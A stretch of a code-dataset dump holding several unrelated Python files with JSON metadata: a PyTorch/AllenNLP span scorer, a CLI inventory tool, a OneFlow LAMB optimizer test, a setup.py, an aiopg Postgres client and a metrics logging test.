'relu',\r\n dropout = 0.0,\r\n spans_per_word = 2,\r\n agg_type = 'max',\r\n loss_reduction = 'sum'):\r\n super(SpanScorerPrune, self).__init__()\r\n \r\n\r\n self.input_dim = input_dim\r\n self.hidden_dim = hidden_dim\r\n self.num_tags = num_tags\r\n \r\n self.activation = activation\r\n self.activation_fn = get_activation_fn(activation)\r\n\r\n self.dropout = dropout\r\n self.spans_per_word = spans_per_word\r\n self.agg_type = agg_type\r\n self.loss_reduction = loss_reduction\r\n \r\n \r\n self.num_layers = 1\r\n self.neg = -1e20\r\n \r\n '''\r\n Create classifier\r\n '''\r\n # Feedforward neural network for predicting span labels\r\n self._label_ffnn = FeedForward( \\\r\n input_dim = self.input_dim,\r\n num_layers = self.num_layers,\r\n hidden_dims = self.hidden_dim, \r\n activations = self.activation_fn,\r\n dropout = self.dropout)\r\n\r\n # Span classifier\r\n self._label_scorer = torch.nn.Sequential(\r\n TimeDistributed(self._label_ffnn),\r\n TimeDistributed(torch.nn.Linear(self.hidden_dim, self.num_tags)))\r\n\r\n '''\r\n Create pruner\r\n '''\r\n # Feedforward neural network for pruning score\r\n #self._pruning_ffnn = FeedForward( \\\r\n # input_dim = self.input_dim,\r\n # num_layers = self.num_layers,\r\n # hidden_dims = self.hidden_dim, \r\n # activations = self.activation,\r\n # dropout = self.dropout)\r\n\r\n # Pruning scoring function\r\n #self._pruning_scorer = torch.nn.Sequential(\r\n # TimeDistributed(self._pruning_ffnn),\r\n # TimeDistributed(torch.nn.Linear(self.hidden_dim, 1)))\r\n \r\n # Pruner\r\n self._pruning_scorer = BeamScorer(self._label_scorer, self.agg_type)\r\n self._pruner = Pruner(self._pruning_scorer) \r\n\r\n\r\n\r\n\r\n def forward(self, embed, mask, seq_lengths, span_labels=None):\r\n '''\r\n Parameters\r\n ----------\r\n span_labels: tensor of labels (batch_size, num_spans)\r\n \r\n Returns\r\n -------\r\n Pulled from AllenNLP GitHub:\r\n https://github.com/allenai/allennlp/blob/master/allennlp/modules/pruner.py\r\n \r\n embed_top : ``torch.FloatTensor``\r\n The representations of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, embedding_size).\r\n mask_top : ``torch.LongTensor``\r\n The corresponding mask for ``embed_top``.\r\n Has shape (batch_size, num_items_to_keep).\r\n indices_top : ``torch.IntTensor``\r\n The indices of the top-k scoring items into the original ``embeddings``\r\n tensor. This is returned because it can be useful to retain pointers to\r\n the original items, if each item is being scored by multiple distinct\r\n scorers, for instance. Has shape (batch_size, num_items_to_keep).\r\n top_item_scores : ``torch.FloatTensor``\r\n The values of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, 1).\r\n '''\r\n \r\n \r\n \r\n # Number of spans to keep by sentence\r\n # (batch_size)\r\n num_to_keep = seq_lengths*self.spans_per_word\r\n num_to_keep = torch.max(num_to_keep, torch.ones_like(num_to_keep))\r\n \r\n # Apply pruner to embeddings\r\n # embed_top (batch_size, max_num_to_keep, embed_dim)\r\n # mask_top, indices_top, prune_scores_top (batch_size, max_num_to_keep)\r\n # prune_scores_top (batch_size, max_num_to_keep, 1)\r\n embed_top, mask_top, indices_top, prune_scores_top = \\\r\n self._pruner(embed, mask, num_to_keep) \r\n prune_scores_top = prune_scores_top.squeeze(-1) \r\n\r\n # Compute label scores\r\n # (batch_size, num_spans, num_tags)\r\n label_scores = self._label_scorer(embed)\r\n\r\n # Give large negative scores to the masked-out values.\r\n label_scores = util.replace_masked_values( \\\r\n tensor = label_scores, \r\n mask = mask.unsqueeze(-1), \r\n replace_with = self.neg)\r\n\r\n # Top span scores\r\n label_scores_top = \\\r\n util.batched_index_select(label_scores, indices_top)\r\n\r\n if span_labels is None:\r\n loss = None\r\n else:\r\n loss = get_entity_loss( \\\r\n scores = label_scores, \r\n labels = span_labels, \r\n mask = mask,\r\n reduction = self.loss_reduction)\r\n\r\n \r\n return (embed_top, mask_top, indices_top, prune_scores_top, \r\n label_scores_top, loss)\r\n\r\n \r\n ", "sub_path": "code/pytorch_models/span_scoring.py", "file_name": "span_scoring.py", "file_ext": "py", "file_size_in_byte": 27319, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "torch.nn.Module", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "allennlp.modules.span_extractors.EndpointSpanExtractor", "line_number": 63, "usage_type": "call"}, {"api_name": "allennlp.modules.span_extractors.SelfAttentiveSpanExtractor", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.zeros_like", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 141, "usage_type": "attribute"}, {"api_name": "pytorch_models.utils.one_hot", "line_number": 156, "usage_type": "call"}, {"api_name": "allennlp.nn.util.batched_index_select", "line_number": 161, "usage_type": "call"}, {"api_name": "allennlp.nn.util", "line_number": 161, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 168, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 168, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 178, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 178, "usage_type": "name"}, {"api_name": "allennlp.modules.TimeDistributed", "line_number": 201, "usage_type": "call"}, {"api_name": "allennlp.modules.Pruner", "line_number": 202, "usage_type": "call"}, {"api_name": "allennlp.nn.util.batched_index_select", "line_number": 243, "usage_type": "call"}, {"api_name": "allennlp.nn.util", "line_number": 243, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 249, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 249, "usage_type": "name"}, {"api_name": "pytorch_models.utils.map_dict_builder", "line_number": 276, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 282, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 282, "usage_type": "name"}, {"api_name": "allennlp.modules.conditional_random_field.ConditionalRandomField", "line_number": 285, "usage_type": "call"}, {"api_name": "allennlp.modules.TimeDistributed", "line_number": 291, "usage_type": "call"}, {"api_name": "allennlp.modules.Pruner", "line_number": 292, "usage_type": "call"}, {"api_name": "allennlp.nn.util.batched_index_select", "line_number": 333, "usage_type": "call"}, {"api_name": "allennlp.nn.util", "line_number": 333, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 377, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 377, "usage_type": "attribute"}, {"api_name": "logging.warn", "line_number": 399, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 400, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 401, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 445, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 446, "usage_type": "attribute"}, {"api_name": "logging.warn", "line_number": 469, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 498, "usage_type": "call"}, {"api_name": "torch.LongTensor", "line_number": 499, "usage_type": "attribute"}, {"api_name": "torch.nonzero", "line_number": 505, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 543, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 544, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 545, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 620, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 624, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 624, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 652, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 652, "usage_type": "name"}, {"api_name": "pytorch_models.utils.get_activation_fn", "line_number": 681, "usage_type": "call"}, {"api_name": "allennlp.modules.FeedForward", "line_number": 696, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 704, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 704, "usage_type": "attribute"}, {"api_name": "allennlp.modules.TimeDistributed", "line_number": 705, "usage_type": "call"}, {"api_name": "allennlp.modules.TimeDistributed", "line_number": 706, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 706, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 706, "usage_type": "attribute"}, {"api_name": "allennlp.modules.Pruner", "line_number": 726, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 763, "usage_type": "call"}, {"api_name": "torch.ones_like", "line_number": 763, "usage_type": "call"}, {"api_name": "allennlp.nn.util.replace_masked_values", "line_number": 778, "usage_type": "call"}, {"api_name": "allennlp.nn.util", "line_number": 778, "usage_type": "name"}, {"api_name": "allennlp.nn.util.batched_index_select", "line_number": 785, "usage_type": "call"}, {"api_name": "allennlp.nn.util", "line_number": 785, "usage_type": "name"}, {"api_name": "pytorch_models.training.get_entity_loss", "line_number": 790, "usage_type": "call"}]} {"seq_id": "571255145", "text": "#!/usr/bin/env python3\n\nimport argparse\nimport os\n\nimport command_add\nimport command_show\nimport command_update\n\n\ndef create_parser():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers(help=\"subcommands\")\n\n parser.add_argument(\"-i\", \"--inventory\", default=\"data/inventory.db\", help=\"path to inventory database\")\n parser.add_argument(\"-m\", \"--market\", default=\"data/market.json\", help=\"path to market database\")\n\n parser_add = subparsers.add_parser(\"add\", help=\"add an item to inventory\")\n parser_add.set_defaults(command=command_add.run)\n parser_add.add_argument(\"item\", nargs=\"?\")\n parser_add.add_argument(\"count\", nargs=\"?\", default=1, type=int)\n\n parser_show = subparsers.add_parser(\"show\", help=\"show full inventory\")\n parser_show.set_defaults(command=command_show.run)\n parser_show.add_argument(\"-d\", \"--ducats\", action=\"store_true\", help=\"sort by ducats/price value\")\n parser_show.add_argument(\"-p\", \"--plats\", action=\"store_true\", help=\"sort by price\")\n\n parser_update = subparsers.add_parser(\"update\")\n parser_update.set_defaults(command=command_update.run)\n\n return parser\n\n\nif __name__ == \"__main__\":\n parser = create_parser()\n args = parser.parse_args()\n os.makedirs(\"data\", exist_ok=True)\n if \"command\" in args:\n args.command(args)\n else:\n parser.print_help()\n", "sub_path": "wfih.py", "file_name": "wfih.py", "file_ext": "py", "file_size_in_byte": 1368, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "command_add.run", "line_number": 19, "usage_type": "attribute"}, {"api_name": "command_show.run", "line_number": 24, "usage_type": "attribute"}, {"api_name": "command_update.run", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 37, "usage_type": "call"}]} {"seq_id": "637822495", "text": "\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport os\nimport unittest\nfrom collections import OrderedDict\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_addons as tfa\nimport test_global_storage\nfrom test_util import GenArgList\n\nimport oneflow.compatible.single_client.unittest\nfrom oneflow.compatible import single_client as flow\n\ngpus = tf.config.experimental.list_physical_devices(\"GPU\")\nfor gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n\n\ndef compare_with_tensorflow_addons_lamb(\n test_case,\n device_type,\n x_shape,\n beta1,\n beta2,\n epsilon,\n weight_decay,\n learning_rate,\n train_iters,\n):\n assert device_type in [\"gpu\", \"cpu\"]\n flow.clear_default_session()\n func_config = flow.FunctionConfig()\n func_config.default_data_type(flow.float32)\n\n @flow.global_function(type=\"train\", function_config=flow.FunctionConfig())\n def testLAMB(\n random_mask: flow.typing.Numpy.Placeholder(x_shape, dtype=flow.float32)\n ) -> flow.typing.Numpy:\n with flow.scope.placement(device_type, \"0:0-0\"):\n x = flow.get_variable(\n name=\"x\",\n shape=x_shape,\n dtype=flow.float32,\n initializer=flow.random_uniform_initializer(minval=-10, maxval=10),\n trainable=True,\n )\n loss = flow.math.reduce_mean(x + random_mask)\n flow.optimizer.LAMB(\n flow.optimizer.PiecewiseConstantScheduler([], [learning_rate]),\n beta1=beta1,\n beta2=beta2,\n epsilon=epsilon,\n weight_decay=weight_decay,\n ).minimize(loss)\n return x\n\n random_masks_seq = []\n for i in range(train_iters + 1):\n random_masks_seq.append(np.random.uniform(size=x_shape).astype(np.float32))\n x_list = []\n init_value = None\n for i in range(train_iters + 1):\n x = testLAMB(random_masks_seq[i])\n x_list.append(x)\n if i == 0:\n init_value = np.copy(x)\n var = tf.Variable(init_value)\n opt = tfa.optimizers.LAMB(\n learning_rate=learning_rate,\n beta_1=beta1,\n beta_2=beta2,\n epsilon=epsilon,\n weight_decay_rate=weight_decay,\n )\n var_list = []\n for i in range(train_iters):\n with tf.GradientTape() as tape:\n if i == 0:\n var0 = tf.identity(var)\n var_list.append(var0)\n random_mask = tf.Variable(random_masks_seq[i])\n loss = tf.reduce_mean(var + random_mask)\n gradients = tape.gradient(loss, var)\n opt.apply_gradients(zip([gradients], [var]))\n var_list.append(var.numpy())\n case = (\n device_type,\n x_shape,\n beta1,\n beta2,\n epsilon,\n weight_decay,\n learning_rate,\n train_iters,\n )\n test_case.assertTrue(len(x_list) == len(var_list))\n for (i, o, t) in zip(range(len(var_list)), x_list, var_list):\n diff = o - t\n test_case.assertTrue(\n np.allclose(x_list[i], var_list[i], rtol=0.001, atol=0.001), (i, case, diff)\n )\n diff = x.flatten() - var.numpy().flatten()\n test_case.assertTrue(\n np.allclose(x.flatten(), var.numpy().flatten(), rtol=0.001, atol=0.001),\n (case, diff),\n )\n\n\n@flow.unittest.skip_unless_1n1d()\nclass TestLamb(flow.unittest.TestCase):\n def test_lamb(test_case):\n arg_dict = OrderedDict()\n arg_dict[\"test_case\"] = [test_case]\n arg_dict[\"device_type\"] = [\"cpu\", \"gpu\"]\n arg_dict[\"x_shape\"] = [(10,)]\n arg_dict[\"beta1\"] = [0.9]\n arg_dict[\"beta2\"] = [0.999]\n arg_dict[\"epsilon\"] = [1e-06]\n arg_dict[\"weight_decay\"] = [0.01]\n arg_dict[\"learning_rate\"] = [0.0001]\n arg_dict[\"train_iters\"] = [10]\n for arg in GenArgList(arg_dict):\n compare_with_tensorflow_addons_lamb(*arg)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "sub_path": "python/oneflow/compatible/single_client/test/ops/test_lamb.py", "file_name": "test_lamb.py", "file_ext": "py", "file_size_in_byte": 4515, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "tensorflow.config.experimental.list_physical_devices", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.config", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.config.experimental.set_memory_growth", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.config", "line_number": 32, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client.clear_default_session", "line_number": 47, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client", "line_number": 47, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.FunctionConfig", "line_number": 48, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client", "line_number": 48, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.float32", "line_number": 49, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 49, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.typing.Numpy.Placeholder", "line_number": 53, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.typing", "line_number": 53, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 53, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.float32", "line_number": 53, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client.scope.placement", "line_number": 55, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.scope", "line_number": 55, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 55, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.get_variable", "line_number": 56, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client", "line_number": 56, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.float32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 59, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.random_uniform_initializer", "line_number": 60, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client", "line_number": 60, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.math.reduce_mean", "line_number": 63, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.math", "line_number": 63, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 63, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.optimizer.LAMB", "line_number": 64, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.optimizer", "line_number": 64, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 64, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.optimizer.PiecewiseConstantScheduler", "line_number": 65, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.optimizer", "line_number": 65, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 65, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.global_function", "line_number": 51, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client", "line_number": 51, "usage_type": "name"}, {"api_name": "oneflow.compatible.single_client.FunctionConfig", "line_number": 51, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.typing", "line_number": 54, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 54, "usage_type": "name"}, {"api_name": "numpy.random.uniform", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 75, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 75, "usage_type": "attribute"}, {"api_name": "numpy.copy", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow_addons.optimizers.LAMB", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow_addons.optimizers", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tensorflow.GradientTape", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.identity", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 116, "usage_type": "call"}, {"api_name": "numpy.allclose", "line_number": 120, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.unittest", "line_number": 126, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 126, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 128, "usage_type": "call"}, {"api_name": "test_util.GenArgList", "line_number": 138, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.unittest.skip_unless_1n1d", "line_number": 125, "usage_type": "call"}, {"api_name": "oneflow.compatible.single_client.unittest", "line_number": 125, "usage_type": "attribute"}, {"api_name": "oneflow.compatible.single_client", "line_number": 125, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 143, "usage_type": "call"}]} {"seq_id": "584236581", "text": "import os\nfrom setuptools import setup\n\nwith open(os.path.join(os.path.dirname(__file__), \"README.md\"), encoding=\"utf-8\") as f:\n long_description = f.read()\n\nmodule_version = \"0.1.5\"\n\nsetup(\n name=\"DailyLogger\",\n packages=[\"DailyLogger\"],\n version=module_version,\n license=\"MIT\",\n description=\"A basic daily logger to log python projects.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n author=\"Samyak Ratna Tamrakar\",\n author_email=\"samyak.r.tamrakar@gmail.com\",\n url=\"https://github.com/srtamrakar/python-logger\",\n download_url=f\"https://github.com/srtamrakar/python-logger/archive/v_{module_version}.tar.gz\",\n keywords=[\"log\", \"logger\", \"logging\"],\n install_requires=[\"multiprocessing_logging==0.3.0\"],\n classifiers=[\n \"Development Status :: 4 - Beta\", # Either\"3 - Alpha\", \"4 - Beta\" or \"5 - Production/Stable\"\n \"Intended Audience :: Developers\", # Define that your audience are developers\n \"Topic :: Software Development :: Build Tools\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n ],\n)\n", "sub_path": "pypi_install_script/DailyLogger-0.1.5.tar/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1352, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "os.path.join", "line_number": 4, "usage_type": "call"}, {"api_name": "os.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 4, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 9, "usage_type": "call"}]} {"seq_id": "345757332", "text": "import datetime\nfrom typing import Dict, Iterable, Mapping\n\nimport attr\n\nimport aiopg.sa\nfrom aiopg.sa.result import ResultProxy, RowProxy\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects.postgresql import Insert\nfrom sqlalchemy.sql.selectable import Select\nfrom sqlalchemy.sql import and_, not_\nfrom sqlalchemy.sql.schema import Column\n\nDEFAULT_PAGE_SIZE = 100\n\n\nclass BasePostgresClient:\n def __init__(\n self,\n usecase_class,\n engine: aiopg.sa.Engine,\n table: sa.Table,\n db_generated_fields: Iterable[str] = None,\n ):\n self.usecase_class = usecase_class\n self.engine = engine\n self.table = table\n self.db_generated_fields = db_generated_fields or [\"created_at\", \"updated_at\"]\n\n async def insert(self, usecase):\n serialized_usecase: Dict = self._serialize_for_db(usecase)\n async with self.engine.acquire() as conn:\n statement: Insert = (\n self.table.insert()\n .values(**serialized_usecase)\n .returning(*[column for column in self.table.columns])\n )\n results: ResultProxy = await conn.execute(statement)\n return await results.fetchone()\n\n async def select_first_where(\n self, include: Mapping = None, exclude: Mapping = None\n ):\n results = await self.select_where(include=include, exclude=exclude, page_size=1)\n if results:\n return results[0]\n return None\n\n async def select_where(\n self, include: Mapping = None, exclude: Mapping = None, page=0, page_size=None\n ):\n where_clause = self._generate_where_clause(include, exclude)\n page_size = page_size if page_size else DEFAULT_PAGE_SIZE\n async with self.engine.acquire() as conn:\n statement: Select = self.table.select().where(where_clause)\n paginated_statement = self._paginate_query(statement, page, page_size)\n results: ResultProxy = await conn.execute(paginated_statement)\n return [await self._deserialize_from_db(result) async for result in results]\n\n async def update_where(\n self, set_values: Mapping, include: Mapping = None, exclude: Mapping = None\n ):\n where_clause = self._generate_where_clause(include, exclude)\n async with self.engine.acquire() as conn:\n statement = self.table.update.where(where_clause)\n\n def _generate_where_clause(self, include: Mapping = None, exclude: Mapping = None):\n \"\"\"Turn inclusion/exclusion maps into SQLAlchemy `where` clause\"\"\"\n inclusion_ands = []\n exclusion_ands = []\n if include:\n for field, includes in include.items():\n table_col: Column = getattr(self.table.c, field)\n if _isiterable(includes):\n # Use SQL [column] IN [(values)]\n inclusion_ands.append(table_col.in_(includes))\n else:\n # Use SQL [column] = [value]\n inclusion_ands.append(table_col == includes)\n if exclude:\n for field, excludes in exclude.items():\n table_col: Column = getattr(self.table.c, field)\n if _isiterable(excludes):\n # Use SQL [column] NOT IN [(values)]\n exclusion_ands.append(not_(table_col.in_(excludes)))\n else:\n # Use SQL [column] != [value]\n exclusion_ands.append(table_col != excludes)\n return and_(*inclusion_ands, *exclusion_ands)\n\n def _generate_values_clause(self, set_values: Mapping):\n pass\n\n def _paginate_query(self, where_clause, page=0, page_size=None):\n if page_size:\n where_clause = where_clause.limit(page_size)\n if page:\n where_clause = where_clause.offset(page * page_size)\n return where_clause\n\n async def _deserialize_from_db(self, row: RowProxy):\n # returns attrs object if successful\n row_dict = dict(row)\n return self.usecase_class(**row_dict)\n\n def _serialize_for_db(self, usecase) -> Dict:\n # at this point we're assuming attrs objects for usecases\n usecase_dict: Dict = attr.asdict(usecase)\n for db_generated_field in self.db_generated_fields:\n if usecase_dict.get(db_generated_field) is None:\n # inserting a non-nullable field with value None will result in a\n # `psycopg2.IntegrityError: null value in column violates not-null constraint`\n # we delete the value from the dict instead\n del usecase_dict[db_generated_field]\n for k, v in usecase_dict.items():\n if isinstance(v, datetime.datetime):\n usecase_dict[k]: str = v.isoformat()\n return usecase_dict\n\n\ndef _isiterable(var) -> bool:\n return isinstance(var, Iterable) and not isinstance(var, str)\n", "sub_path": "app/infrastructure/datastore/postgres/clients/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 4918, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "aiopg.sa.sa", "line_number": 21, "usage_type": "attribute"}, {"api_name": "aiopg.sa", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Table", "line_number": 22, "usage_type": "attribute"}, {"api_name": "typing.Iterable", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 31, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.postgresql.Insert", "line_number": 33, "usage_type": "name"}, {"api_name": "aiopg.sa.result.ResultProxy", "line_number": 38, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 50, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.selectable.Select", "line_number": 55, "usage_type": "name"}, {"api_name": "aiopg.sa.result.ResultProxy", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 61, "usage_type": "name"}, {"api_name": "typing.Mapping", "line_number": 67, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.schema.Column", "line_number": 73, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.schema.Column", "line_number": 82, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.not_", "line_number": 85, "usage_type": "call"}, {"api_name": "sqlalchemy.sql.and_", "line_number": 89, "usage_type": "call"}, {"api_name": "typing.Mapping", "line_number": 91, "usage_type": "name"}, {"api_name": "aiopg.sa.result.RowProxy", "line_number": 101, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 108, "usage_type": "name"}, {"api_name": "attr.asdict", "line_number": 108, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 116, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 122, "usage_type": "argument"}]} {"seq_id": "19843667", "text": "import os\nimport glob\nimport unittest\nimport datetime\n\nfrom haymetric import Metrics, Units, Rotations\n\n\ndef remove_files(files):\n for f in glob.glob(files):\n os.remove(f)\n\n\ndef read_file_to_lines(filename):\n f = open(filename)\n lines = f.readlines()\n f.close()\n return lines\n\n\nclass TestHaymetric(unittest.TestCase):\n def setUp(self):\n self.log_path = \"tst/logs/Test.log\"\n # Wed, 11 May 2016 21:21:00 GMT\n self.sample_timestamp = 1463001660\n self.sample_logfile = self.__get_logfile(self.sample_timestamp)\n\n def tearDown(self):\n remove_files(self.log_path + \"*\")\n os.removedirs(\"tst/logs\")\n\n def test_emit_from_different_metrics(self):\n self.__assert_emit_metrics(\"service=MyTestProgram,market=Hanoi\",\n \"service=MyTestProgram,market=Hanoi\",\n \"method=GetAPI\", \"method=PushAPI\")\n\n def test_emit_metrics_with_dimensions_and_scopes_as_dict(self):\n self.__assert_emit_metrics({\"service\": \"MyTestProgram\", \"market\": \"Hanoi\"},\n {\"service\": \"MyTestProgram\", \"market\": \"Hanoi\"},\n {\"method\": \"GetAPI\"}, {\"method\": \"PushAPI\"})\n\n def test_rotation_when_time_changes(self):\n # Wed, 11 May 2016 20:33:01 GMT\n t1 = 1462998781\n # Wed, 11 May 2016 21:33:01 GMT\n t2 = 1463002381\n\n metrics = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\")\n self.__add_values(metrics.get_scope(\"method=GetAPI\"))\n metrics.flush(t1)\n self.__add_counters(metrics.get_scope(\"method=PushAPI\"))\n metrics.flush(t2)\n metrics.close()\n t1_lines = read_file_to_lines(self.__get_logfile(t1))\n t2_lines = read_file_to_lines(self.__get_logfile(t2))\n self.assertEqual(4, len(t1_lines))\n self.assertEqual(\"Timestamp=1462998781\\n\", t1_lines[0])\n self.assertEqual(\"Dimensions=market=Hanoi,method=GetAPI,service=MyTestProgram\\n\", t1_lines[1])\n self.assertEqual(\"Metrics=NoUnit=999+1,DBTime=10ms,Time=1200+800ms\\n\", t1_lines[2])\n self.assertEqual(\"---------\\n\", t1_lines[3])\n self.assertEqual(4, len(t2_lines))\n self.assertEqual(\"Timestamp=1463002381\\n\", t2_lines[0])\n self.assertEqual(\"Dimensions=market=Hanoi,method=PushAPI,service=MyTestProgram\\n\", t2_lines[1])\n self.assertEqual(\"Metrics=Failed=2,Pushes=11\\n\", t2_lines[2])\n self.assertEqual(\"---------\\n\", t2_lines[3])\n\n def test_multiple_rotations(self):\n metrics_minutely = Metrics(self.log_path, \"service=MyTestProgram,market=Hanoi\", Rotations.MINUTELY)\n metrics_minutely.flush()\n self.assertTrue(os.path.isfile(self.__get_logfile(rotation=Rotations.MINUTELY)))\n metrics_hourly 